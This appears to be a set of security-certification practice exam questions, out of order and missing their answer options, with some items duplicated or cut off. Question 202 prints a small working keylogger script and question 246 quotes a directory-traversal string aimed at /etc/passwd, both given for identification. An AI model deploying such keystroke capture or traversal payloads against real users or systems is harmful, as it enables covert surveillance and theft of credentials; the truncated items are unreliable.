
T.W.C701




60. An employee receives a text message from an unknown number claiming to be the company's Chief Executive Officer and asking the employee to purchase several gift cards.

Which of the following types of attacks does this describe?





212. Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?





163. Which of the following involves an attempt to take advantage of database misconfigurations?





137. A company is discarding a classified storage array and hires an outside vendor to complete the disposal.

Which of the following should the company request from the vendor?





169. Which of the following is the most common data loss path for an air-gapped network?





57. A company is planning to set up a SIEM system and assign an analyst to review the logs on a weekly basis.

Which of the following types of controls is the company setting up?





295. Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to an entrance?





14. A penetration tester begins an engagement by performing port and service scans against the client environment according to the rules of engagement.

Which of the following reconnaissance types is the tester performing?





239. Which of the following should be addressed first on security devices before connecting to the network?





30. Which of the following security control types does an acceptable use policy best represent?





165. Which of the following is used to quantitatively measure the criticality of a vulnerability?





195. A company owns a public-facing e-commerce website. The company outsources credit card transactions to a payment company.

Which of the following BEST describes the role of the payment company?





311. An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sales systems. The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load.

Which of the following are the best options to accomplish this objective? (Select two.)







302. Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ether ports located in conference rooms.

Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?





27. Which of the following is a cryptographic concept that operates on a fixed length of bits?





173. A systems administrator wants to prevent users from being able to access data based on their responsibilities. The administrator also wants to apply the required access structure via a simplified format.

Which of the following should the administrator apply to the site recovery resource group?





270. An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced due to loss, damage, or theft steadily increased by 10%.

Which of the following would best describe the estimated number of devices to be replaced next year?





271. An engineer is using scripting to deploy a network in a cloud environment. Which of the following describes this scenario?





145. A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices.

Which of the following vulnerabilities is the organization addressing?





328. Which of the following describes business units that purchase and implement scripting software without approval from an organization's technology support staff?





34. Which of the following should a security administrator adhere to when setting up a new set of firewall rules?





109. A network manager wants to protect the company's VPN by implementing multifactor authentication that uses:

- Something you know
- Something you have
- Something you are

Which of the following would accomplish the manager's goal?





197. A company completed a vulnerability scan. The scan found malware on several systems that were running older versions of Windows.

Which of the following is MOST likely the cause of the malware infection?





168. Security controls in a data center are being reviewed to ensure data is properly protected and that human life considerations are included.

Which of the following best describes how the controls should be set up?





319. A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites, whether the employee is in the office or away.

Which of the following solutions should the CISO implement?





186. An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document's contents, the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue.

Which of the following attacks was used?





266. A network administrator needs to determine the sequence of a server farm's logs.

Which of the following should the administrator consider? (Select two).







108. After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response to the lawsuit.

Which of the following describes the action the security team will most likely be required to take?





230. A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system.

Which of the following deployment models is the company implementing?





255. A company recently upgraded its authentication infrastructure and now has more computing power.

Which of the following should the company consider using to ensure user credentials are being transmitted and stored more securely?





16. Which of the following is required for an organization to properly manage its restore process in the event of system failure?





307. A company was recently breached. Part of the company's new cybersecurity strategy is to centralize the logs from all security devices.

Which of the following components forwards the logs to a central source?





82. A company hired a consultant to perform an offensive security assessment covering penetration testing and social engineering. Which of the following teams will conduct this assessment activity?





175. An organization discovered a disgruntled employee exfiltrated a large amount of PII data by uploading files. Which of the following controls should the organization consider to mitigate this risk?





133. A security analyst locates a potentially malicious video file on a server and needs to identify both the creation date and the file's creator.

Which of the following actions would most likely give the security analyst the information required?





196. While troubleshooting a service disruption on a mission-critical server, a technician discovered the user account that was configured to run automated processes was disabled because the user's password failed to meet password complexity requirements.

Which of the following would be the BEST solution to securely prevent future issues?





129. Which of the following describes a security alerting and monitoring tool that collects system, application, and network logs from multiple sources in a centralized system?





17. Which of the following vulnerabilities is associated with installing software outside of a manufacturer's approved software repository?





72. Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?

 





117. A healthcare organization wants to provide a web application that allows individuals to digitally report health emergencies.

Which of the following is the most important consideration during development?





298. An employee used a corporate mobile device during a vacation. Multiple contacts were modified on the device during the vacation. Which of the following methods did the attacker use to insert the contacts without having physical access to the device?





204. A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource exhaustion on another server.

Which of the following algorithms should the administrator use to split the number of connections on each server in half?





198. A security administrator is seeking a solution to prevent unauthorized access to the internal network.

Which of the following security solutions should the administrator choose?





214. Which of the following control types is patch management classified under?





310. A security analyst receives an alert that indicates a user's device is displaying anomalous behavior. The analyst suspects the device might be compromised. Which of the following should the analyst do first?





24. A company needs to provide administrative access to internal resources while minimizing the traffic allowed through the security boundary.

Which of the following methods is most secure?





282. A software developer used open-source libraries to streamline development.

Which of the following is the greatest risk when using this approach?





222. Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?





265. A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process.

Which of the following is the most likely cause of the issue?





225. A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer's operating system has been hardened and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the security engineer configure to BEST protect the kiosk computer?





202. Given the following snippet of Python code:

#!/usr/bin/env python3
import logging
from pynput.keyboard import Key, Listener

logging.basicConfig(filename="output.txt", level=logging.DEBUG, format="%(asctime)s %(message)s")

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()


Which of the following types of malware MOST likely contains this snippet?





191. A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs.

Which of the following is the MOST likely cause of this issue?





160. A bank insists all of its vendors must prevent data loss on stolen laptops.

Which of the following strategies is the bank requiring?





120. An analyst is evaluating the implementation of Zero Trust principles within the data plane.

Which of the following would be most relevant for the analyst to evaluate?





279. A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company's mobile application. After reviewing the back-end server logs, the security analyst finds the following entries.

Which of the following is the most likely cause of the security control bypass?





74. A company's legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries.

Which of the following is the most effective way to limit this access?





300. Which of the following best describes when an organization utilizes a ready-to-use application from a cloud provider?





208. Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation for a few days.

Which of the following attacks can the account lockout be attributed to?





70. During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the company will grant the employee access to other company-owned websites based on the intranet profile.

Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user's intranet account? (Select two)







211. An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO).







87. An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device.

Which of the following best describes the user's activity?





219. A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk.

Which of the following techniques should the team use to obtain a sample of the malware binary?





207. A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Select TWO).







69. An administrator is reviewing a single server's security logs and discovers the following:

Which of the following best describes the action captured in this log file?





5. A data administrator is configuring authentication for a SaaS application and would like to reduce the number of credentials employees need to maintain. The company prefers to use domain credentials to access new SaaS applications.

Which of the following methods would allow this functionality?





243. A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release.

Which of the following documents would the third-party vendor most likely be required to review and sign?





119. An attacker posing as the Chief Executive Officer calls an employee and instructs the employee to buy gift cards. Which of the following techniques is the attacker using?





250. A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the router to forward all ports so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets were never patched.

Which of the following should be done to prevent an attack like this from happening again? (Select three).









40. A technician wants to improve the situational and environmental awareness of existing users as they transition from remote to in-office work.

Which of the following is the best option?





105. Which of the following vulnerabilities is exploited when an attacker overwrites a register with a malicious address?





156. After a security awareness training session, a user called the IT help desk and reported a suspicious call. The suspicious caller stated that the Chief Financial Officer wanted credit card information in order to close an invoice.

Which of the following topics did the user recognize from the training?





132. An administrator assists the legal and compliance team with ensuring information about customer transactions is archived for the proper time period.

Which of the following data policies is the administrator carrying out?






296. A major manufacturing company updated its internal infrastructure and just started to allow OAuth applications to access corporate data. Data leakage is being reported.

Which of the following most likely caused the issue?





43. Which of the following roles, according to the shared responsibility model, is responsible for securing the company's database in an IaaS model for a cloud environment?





56. Visitors to a secured facility are required to check in with a photo ID and enter the facility through an access control vestibule.

Which of the following best describes this form of security control?





171. An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and monitoring of remote employee internet traffic.

Which of the following will help achieve these objectives?





286. A candidate attempts to go to but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following best describes this type of attack?





313. A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected, it displayed an error screen and shut down.

Which of the following should the analyst review first to determine more information?





81. Which of the following would be the best way to block unknown programs from executing?





260. A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS.

Which of the following is most likely preventing the IT manager at the hospital from upgrading the specialized OS?





326. A security engineer learns that a non-critical application was compromised. The most recent version of the application includes a malicious reverse proxy while the application is running.

Which of the following should the engineer do to quickly contain the incident with the least amount of impact?





252. A security administrator is compiling information from all devices on the local network in order to gain better visibility into user activities.

Which of the following is the best solution to meet this objective?





6. Which of the following scenarios describes a possible business email compromise attack?





284. A network engineer receives a call regarding multiple LAN-connected devices that are on the same switch. The devices have suddenly been experiencing speed and latency issues while connecting to network resources. The engineer enters the command show mac address-table and reviews the following output.

Which of the following best describes the attack that is currently in progress?





261. An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should be disabled.

Which of the following can be used to accomplish this task?





89. Which of the following is the best way to consistently determine on a daily basis whether security settings on servers have been modified?





206. A security administrator is managing administrative access to sensitive systems with the following requirements:

-Common login accounts must not be used for administrative duties.

-Administrative accounts must be temporal in nature.

-Each administrative account must be assigned to one specific user.

-Accounts must have complex passwords.

-Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?





227. A company needs to enhance its ability to maintain a scalable cloud infrastructure. The infrastructure needs to handle the unpredictable loads on the company's web application.

Which of the following cloud concepts would BEST meet these requirements?





86. A security practitioner completes a vulnerability assessment on a company's network and finds several vulnerabilities, which the operations team remediates.

Which of the following should be done next?





158. Which of the following is used to validate a certificate when it is presented to a user?





238. A company would like to move to the cloud. The company wants to prioritize control and security over cost and ease of management.

Which of the following cloud models would best suit this company's priorities?





146. Which of the following practices would be best to prevent an insider from introducing malicious code into a company's development process?





320. Which of the following is a security implication of newer ICS devices that are becoming more common in corporations?





210. Sales team members have been receiving threatening voicemail messages and have reported these incidents to the IT security team.

Which of the following would be MOST appropriate for the IT security team to analyze?





115. Which of the following methods to secure credit card data is best to use when a requirement is to see only the last four numbers on a credit card?





50. A company is working with a vendor to perform a penetration test. Which of the following includes an estimate about the number of hours required to complete the engagement?





258. Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network.

Which of the following technologies would be best to correlate the activities between the different endpoints?





301. A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information.

Which of the following would BEST meet these objectives?





213. A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down.

Which of the following should the architect implement on the server to achieve this goal?





77. An organization is building a new backup data center with cost-benefit as the primary requirement and RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?





251. A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?





205. A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional under-voltage events that could last up to an hour exists, particularly at one of the locations near an industrial smelter.

Which of the following is the BEST solution to reduce the risk of data loss?





180. A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?





322. A security administrator needs to provide secure access to internal networks for external partners. The administrator has given the PSK and other parameters to the third-party security administrator.

Which of the following is being used to establish this connection?





83. A software development manager wants to ensure the authenticity of the code created by the company.

Which of the following options is the most appropriate?





237. A cybersecurity analyst needs to adopt controls to properly track and log user actions to an individual. Which of the following should the analyst implement?





90. Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's PII?





242. Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?





246. A security analyst reviews web server logs and finds the following string: gallery?file=../../../../../../../etc/passwd

Which of the following attacks was performed against the web server?





15. Which of the following is required for an organization to properly manage its restore process in the event of system failure?





241. Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?





12. A company is required to use certified hardware when building networks.

Which of the following best addresses the risks associated with procuring counterfeit hardware?





294. A company received a "right to be forgotten" request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company most likely complying with?





118. An organization wants a third-party vendor to do a penetration test that targets a specific device. The organization has provided basic information about the device.

Which of the following best describes this kind of penetration test?





254. A financial institution recently joined a bug bounty program to identify security issues in the institution's new public platform.

Which of the following best describes who the institution is working with to identify security issues?





92. A security analyst and the management team are reviewing the organizational performance of a recent phishing campaign. The user click-through rate exceeded the acceptable risk threshold, and the management team wants to reduce the impact when a user clicks on a link in a phishing message.

Which of the following should the analyst do?





39. A company has begun labeling all laptops with asset inventory stickers and associating them with employee IDs.

Which of the following security benefits do these actions provide? (Choose two.)







297. A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST.

Which of the following actions in the rule would work best?





232. An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed.

Which of the following is the MOST likely cause for the high number of findings?





287. A police department is using the cloud to share information with city officials.

Which of the following cloud models describes this scenario?





178. An employee receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm the employee's identity before sending him the prize.

Which of the following BEST describes 





229. A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure only authorized users can access corporate resources.

Which of the following should the security team do?





289. Which of the following security design features can a development team use to analyze the deletion or editing of data sets in the copy?





262. A security operations center wants to implement a solution that can execute files to test for malicious activity. The solution should provide a report of the files' activity against known threats.

Which of the following should the security operations center implement?





128. A security administrator is deploying a DLP solution to prevent the exfiltration of sensitive customer data. Which of the following should the administrator do first?





99. A company is concerned about weather events causing damage to the server room and downtime.

Which of the following should the company consider?





41. A newly appointed board member with cybersecurity knowledge wants the board of directors to receive a quarterly report detailing the number of incidents that impacted the organization. The systems administrator is creating a way to present the data to the board of directors.

Which of the following should the systems administrator use?





123. An enterprise is trying to limit outbound DNS traffic originating from its internal network. Outbound DNS requests will only be allowed from one device with the IP address 10.50.10.25.

Which of the following firewall ACLs will accomplish this goal?





9. An administrator notices that several users are logging in from suspicious IP addresses. After speaking with the users, the administrator determines that the employees were not logging in from those IP addresses and resets the affected users' passwords.

Which of the following should the administrator implement to prevent this type of attack from succeeding in the future?





61. A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours.

Which of the following is most likely occurring?





216. The findings in a consultant's report indicate the most critical risk to the security posture from an incident response perspective is a lack of workstation and server investigation capabilities.

Which of the following should be implemented to remediate this risk?





98. A security analyst reviews domain activity logs and notices the following:

Which of the following is the best explanation for what the security analyst has discovered?

 

 





131. After a recent vulnerability scan, a security engineer needs to harden the routers within the corporate network.

Which of the following is the most appropriate to disable?





324. An attacker is using a method to hide data inside of benign files in order to exfiltrate confidential data.

Which of the following is the attacker most likely using?





314. A data center has experienced an increase in under-voltage events following electrical grid maintenance outside the facility. These events are leading to occasional losses of system availability.

Which of the following would be the most cost-effective solution for the data center to implement?





283. An organization wants to quickly assess how effectively the IT team hardened new laptops.

Which of the following would be the best solution to perform this assessment?





308. Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?





53. Which of the following incident response activities ensures evidence is properly handled?





3. An employee clicked a link in an email from a payment website that asked the employee to update contact information. The employee entered the log-in information but received a page not found error message.

Which of the following types of social engineering attacks occurred?





100. Which of the following is a primary security concern for a company setting up a BYOD program?





203. A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure.

Which of the following should the architect choose?





58. A systems administrator is changing the password policy within an enterprise environment and wants this update implemented on all systems as quickly as possible.

Which of the following operating system security measures will the administrator most likely use?





19. An analyst is evaluating the implementation of Zero Trust principles within the data plane.

Which of the following would be most relevant for the analyst to evaluate?





125. Which of the following factors are the most important to address when formulating a training curriculum plan for a security awareness program? (Select two).







107. Which of the following describes the process of concealing code or text inside a graphical image?





290. A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets that contain large amounts of text.

Which of the following is most likely installed on the compromised host?





217. The management team has requested that the security team implement 802.1X into the existing wireless network setup. The following requirements must be met:

- Minimal interruption to the end user
- Mutual certificate validation

Which of the following authentication protocols would meet these requirements?





321. A security investigation revealed that malicious software was installed on a server using a server administrator's credentials. During the investigation, the server administrator explained that Telnet was regularly used to log in.

Which of the following most likely occurred?





47. A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?





179. An organization wants to enable built-in FDE on all laptops.

Which of the following should the organization ensure is installed on all laptops?





102. Which of the following is the most likely to be included as an element of communication in a security awareness program?





192. Which of the following should customers who are involved with UI developer agreements be concerned with when considering the use of these products on highly sensitive projects?





161. Which of the following would be best suited for constantly changing environments?





228. A user is trying to upload a tax document, which the corporate finance department requested, but a security program is prohibiting the upload. A security analyst determines the file contains PII.

Which of the following steps can the analyst take to correct this issue?





249. A company is enhancing the security of the wireless network and needs to ensure only employees with a valid certificate can authenticate to the network.

Which of the following should the company implement?





187. An employee's company account was used in a data breach. Interviews with the employee revealed:

- The employee was able to avoid changing passwords by using a previous password again.

- The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from recurring? (Select TWO)







248. Which of the following can reduce vulnerabilities by avoiding code reuse?





76. While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable.

Which of the following actions would prevent this issue?





55. A company must ensure sensitive data at rest is rendered unreadable.

Which of the following will the company most likely use?





240. A desktop computer was recently stolen from a desk located in the lobby of an office building.

Which of the following would be the best way to secure a replacement computer and deter future theft?





127. Which of the following is the best reason to complete an audit in a banking environment?





148. After an audit, an administrator discovers all users have access to confidential data on a file server.

Which of the following should the administrator use to restrict access to the data quickly?





157. Which of the following exercises should an organization use to improve its incident response process?





75. Which of the following is a hardware-specific vulnerability?





114. Which of the following must be considered when designing a high-availability network? (Choose two).







36. Which of the following threat actors is the most likely to use large financial resources to attack critical systems located in other countries?





263. A company has hired an assessment team to test the security of the corporate network and employee vigilance. Only the Chief Executive Officer and Chief Operating Officer are aware of this exercise, and very little information has been provided to the assessors.

Which of the following is taking place?





299. A systems analyst is responsible for generating a new digital forensics chain-of-custody form.

Which of the following should the analyst include in this documentation? (Select two).







194. Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?





79. A systems administrator works for a local hospital and needs to ensure patient data is protected and secure.

Which of the following data classifications should be used to secure patient data?





291. An employee's laptop was stolen last month. This morning, the laptop was returned. A cybersecurity analyst retrieved the laptop and has since prepared a cybersecurity incident checklist. Four incident handlers are responsible for executing the checklist.

Which of the following best describes the process for evidence collection assurance?





121. An organization is leveraging a VPN between its headquarters and a branch location.

Which of the following is the VPN protecting?





25. A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee's corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation.

Which of the following logs should the analyst use as a data source?





149. A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team.

Which of the following best describes the threat actor in the CISO's report?





199. A company is concerned about individuals driving a car into the building to gain access.

Which of the following security controls would work BEST to prevent this from happening?






42. A systems administrator receives the following alert from a file integrity monitoring tool:
The hash of the cmd.exe file has changed. The systems administrator checks the OS logs and notices that no patches were applied in the last two months.

Which of the following most likely occurred?





141. After a recent ransomware attack on a company's system, an administrator reviewed the log files.

Which of the following control types did the administrator use?





166. A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS provider.

Which of the following is a risk in the new system?





154. Which of the following best practices gives administrators a set period to perform changes to an operational system to ensure availability and minimize business impacts?





170. Which of the following can best protect against an employee inadvertently installing malware on a company system?





309. Stakeholders at an organisation must be kept aware of any incidents and receive updates on status changes as they occur.

Which of the following Plans would fulfill this requirement?





193. Which of the following would satisfy three-factor authentication requirements?





85. During an investigation, an incident response team attempts to understand the source of an incident.

Which of the following incident response activities describes this process?





164. An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network.

Which of the following should the administrator use to accomplish this goal?





226. An upcoming project focuses on secure communications and trust between external parties.

Which of the following security components will need to be considered to ensure a chosen trust provider is used and the selected option is highly scalable?





209. A security architect is designing the new outbound internet for a small company. The company would like all 50 users to share the same single Internet connection. In addition, users will not be permitted to use social media sites or external email services while at work.

Which of the following should be included in this design to satisfy these requirements? (Select TWO).







59. Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclosed?





201. A network administrator needs to determine the sequence of a server farm's logs.

Which of the following should the administrator consider? (Select TWO).







181. Which of the following biometric authentication methods is the MOST accurate?





200. A security team will be outsourcing several key functions to a third party and will require that:

-Several of the functions will carry an audit burden.

-Attestations will be performed several times a year.

-Reports will be generated on a monthly basis.

Which of the following BEST describes the document that is used to define these requirements and stipulate how and when they are performed by the third party?





220. A security administrator is managing administrative access to sensitive systems with the following requirements:

-Common login accounts must not be used for administrative duties.

-Administrative accounts must be temporal in nature.

-Each administrative account must be assigned to one specific user.

- Accounts must have complex passwords.

- Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?





256. Which of the following social engineering attacks best describes an email that is primarily intended to mislead recipients into forwarding the email to others?





264. A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would most likely contain language that would prohibit this activity?





288. Which of the following allows access to remote computing resources, an operating system, and centralized configuration and data?





293. Which of the following control types is patch management classified under?





325. An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox.

Which of the following would be the best way for the security administrator to address this type of alert in the future?





101. A company decided to reduce the cost of its annual cyber insurance policy by removing the coverage for ransomware attacks.

Which of the following analysis elements did the company most likely use in making this decision?





135. A security administrator needs a method to secure data in an environment that includes some form of checks so that the administrator can track any changes.

Which of the following should the administrator set up to achieve this goal?





162. A security analyst scans a company's public network and discovers a host is running a remote desktop that can be used to access the production network.

Which of the following changes should the security analyst recommend?





65. Which of the following is used to protect a computer from viruses, malware, and Trojans being installed and moving laterally across the network?





31. An IT manager informs the entire help desk staff that only the IT manager and the help desk lead will have access to the administrator console of the help desk software.

Which of the following security techniques is the IT manager setting up?





247. A security administrator is integrating several segments onto a single network. One of the segments, which includes legacy devices, presents a significant amount of risk to the network.

Which of the following would allow users access to the legacy devices without compromising the security of the entire network?






327. Which of the following models offers third-party-hosted, on-demand computing resources that can be shared with multiple organizations over the internet?





218. Which of the following describes where an attacker can purchase DDoS or ransomware services?





155. Which of the following actions could a security engineer take to ensure workstations and servers are properly monitored for unauthorized changes and software?





126. An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system.

Which of the following best describes the actions taken by the organization?





21. A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen.

Which of the following would BEST meet these requirements? (Select TWO).







312. Which of the following would provide guidelines on how to label new network devices as part of the
initial configuration?





276. Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices.

Which of the following tools should the security analyst use to help identify if the traffic is being blocked?





51. Which of the following teams combines both offensive and defensive testing techniques to protect
an organization's critical systems?





151. A company is developing a critical system for the government and storing project information on a fileshare.

Which of the following describes how this data will most likely be classified? (Select two).







78. A company requires hard drives to be securely wiped before sending decommissioned systems to recycling. Which of the following best describes this policy?





150. A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems.

Which of the following is the security team most likely to document as a security implication of the current architecture?





235. A security engineer is concerned the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer wants a tool that can monitor for changes to key files and network traffic for the device.

Which of the following tools should the engineer select?





188. A company is concerned about individuals driving a car into the building to gain access.

Which of the following security controls would work BEST to prevent this from happening?






234. A web server log contains two million lines. A security analyst wants to obtain the next 500 lines starting from line 4,600. Which of the following commands will help the security analyst to achieve this objective?





113. Which of the following automation use cases would best enhance the security posture of an organization by rapidly updating permissions when employees 





233. A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?





185. A company would like to set up a secure way to transfer data between users via their mobile phones. The company's top priority is utilizing technology that requires users to be in as close proximity as possible to each other.

Which of the following connection methods would BEST fulfill this need?





329. A security operations technician is searching the log named /var/messages for any events that were associated with a workstation with the IP address 10.1.1.1.

Which of the following would provide this information?





45. A security team is reviewing the findings in a report that was delivered after a third party performed a penetration test. One of the findings indicated that a web application form field is vulnerable to cross-site scripting. Which of the following application security techniques should the security analyst recommend the developer implement to prevent this vulnerability?





37. Which of the following enables the use of an input field to run commands that can view or manipulate data?





71. An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits.

Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?





317. A cybersecurity analyst at Company A is working to establish a secure communication channel with a counterpart at Company B, which is 3,000 miles (4.828 kilometers) away.

Which of the following concepts would help the analyst meet this goal in a secure manner?





54. Which of the following describes the maximum allowance of accepted risk?





10. An employee receives a text message that appears to have been sent by the payroll department and is asking for credential verification.

Which of the following social engineering techniques are being attempted? (Choose two.)







143. A Chief Information Security Officer wants to monitor the company's servers for SQLi attacks and allow for comprehensive investigations if an attack occurs. The company uses SSL decryption to allow traffic monitoring.

Which of the following strategies would best accomplish this goal?





268. A security administrator suspects there may be unnecessary services running on a server.

Which of the following tools will the administrator most likely use to confirm the suspicions?





8. An organization's internet-facing website was compromised when an attacker exploited a buffer overflow.

Which of the following should the organization deploy to best protect against similar attacks in the future?





330. A company was recently breached. Part of the company's new cybersecurity strategy is to centralize the logs from all security devices.

Which of the following components forwards the logs to a central source?





66. A user is attempting to patch a critical system, but the patch fails to transfer. Which of the following access controls is most likely inhibiting the transfer?





152. After reviewing the following vulnerability scanning report:

Server: 192.168.14.6
Service: Telnet
Port: 23 Protocol: TCP
Status: Open Severity: High
Vulnerability: Use of an insecure network protocol

A security analyst performs the following test:

nmap -p 23 192.168.14.6 --script telnet-encryption
PORT   STATE SERVICE REASON
23/tcp open  telnet  syn-ack
| telnet-encryption:
|_  Telnet server supports encryption

Which of the following would the security analyst conclude for this reported vulnerability?





48. Which of the following describes the reason root cause analysis should be conducted as part of
incident response?





44. A client asked a security company to provide a document outlining the project, the cost, and the completion time frame. Which of the following documents should the company provide to the client?





96. A systems administrator is looking for a low-cost application-hosting solution that is cloud-based.

Which of the following meets these requirements?





73. A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption.

Which of the following best describes this step?





11. Several employees received a fraudulent text message from someone claiming to be the Chief Executive Officer (CEO). The message stated: "I'm in an airport right now with no access to email. I need you to buy gift cards for employee recognition awards. Please send the gift cards to the following email address."

Which of the following are the best responses to this situation? (Choose two).







304. A systems engineer thinks a business system has been compromised and is being used to exfiltrate data to a competitor. The engineer contacts the CSIRT. The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else.

Which of the following is the most likely reason for this request?





26. A cyber operations team informs a security analyst about a new tactic malicious actors are using to
compromise networks. SIEM alerts have not yet been configured.

Which of the following best describes what the security analyst should do to identify this behavior?





33. The local administrator account for a company's VPN appliance was unexpectedly used to log in to the remote management interface.

Which of the following would have most likely prevented this from happening?





142. Which of the following agreement types defines the time frame in which a vendor needs to respond?





147. A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users.

Which of the following would be a good use case for this task?





189. A security analyst is using OSINT to gather information to verify whether company data is available publicly.

Which of the following is the BEST application for the analyst to use?





106. Which of the following would be the best way to handle a critical business application that is running on a legacy server?





93. Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?





144. A client demands at least 99.99% uptime from a service provider's hosted security services.

Which of the following documents includes the information the service provider should return to the client?





236. Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?





153. A security consultant needs secure, remote access to a client environment.

Which of the following should the security consultant most likely use to gain access?





49. Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?





305. Which of the following secure application development concepts aims to block verbose error messages from being shown in a user's interface?





63. A business received a small grant to migrate its infrastructure to an off-premises solution.

Which of the following should be considered first?





2. Which of the following is used to add extra complexity before using a one-way data transformation
